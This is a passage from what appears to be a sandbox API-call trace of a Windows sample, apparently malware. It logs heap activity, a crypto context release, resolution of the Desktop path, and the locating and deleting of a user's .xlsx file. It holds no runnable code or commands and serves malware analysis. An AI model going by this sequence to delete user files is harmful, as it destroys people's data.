[0190.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.322] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.323] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.323] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.323] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.323] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.323] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.323] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.323] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.323] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.323] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.323] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.323] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.323] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.323] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.324] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.324] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.324] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.324] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.324] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0190.324] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.324] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.324] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.324] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.324] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.325] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.325] FreeLibrary (hLibModule=0x74d40000) returned 1 [0190.325] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.325] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.325] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.326] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.326] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.328] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.328] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0190.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.329] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0190.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c948 [0190.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/YItI7wiYOV-Y.xlsx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YItI7wiYOV-Y.xlsx", lpFilePart=0x8bedfc*="YItI7wiYOV-Y.xlsx") returned 0x37 [0190.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0190.330] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YItI7wiYOV-Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yiti7wiyov-y.xlsx")) returned 0x20 [0190.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YItI7wiYOV-Y.xlsx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3e13340, ftCreationTime.dwHighDateTime=0x1d4c8a2, ftLastAccessTime.dwLowDateTime=0xb89c1c00, ftLastAccessTime.dwHighDateTime=0x1d4ce49, ftLastWriteTime.dwLowDateTime=0xb89c1c00, ftLastWriteTime.dwHighDateTime=0x1d4ce49, nFileSizeHigh=0x0, nFileSizeLow=0x5d75, dwReserved0=0x89, dwReserved1=0x4, cFileName="YItI7wiYOV-Y.xlsx", cAlternateFileName="YITI7W~1.XLS")) returned 0xaa58e0 [0190.330] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YItI7wiYOV-Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yiti7wiyov-y.xlsx")) returned 1 [0190.334] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3e13340, ftCreationTime.dwHighDateTime=0x1d4c8a2, ftLastAccessTime.dwLowDateTime=0xb89c1c00, ftLastAccessTime.dwHighDateTime=0x1d4ce49, ftLastWriteTime.dwLowDateTime=0xb89c1c00, ftLastWriteTime.dwHighDateTime=0x1d4ce49, nFileSizeHigh=0x0, nFileSizeLow=0x5d75, dwReserved0=0x89, dwReserved1=0x4, cFileName="YItI7wiYOV-Y.xlsx", cAlternateFileName="YITI7W~1.XLS")) returned 0 [0190.334] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0190.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.334] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0190.335] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.335] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0190.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0190.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c948 [0190.337] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/YItI7wiYOV-Y.xlsx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YItI7wiYOV-Y.xlsx", 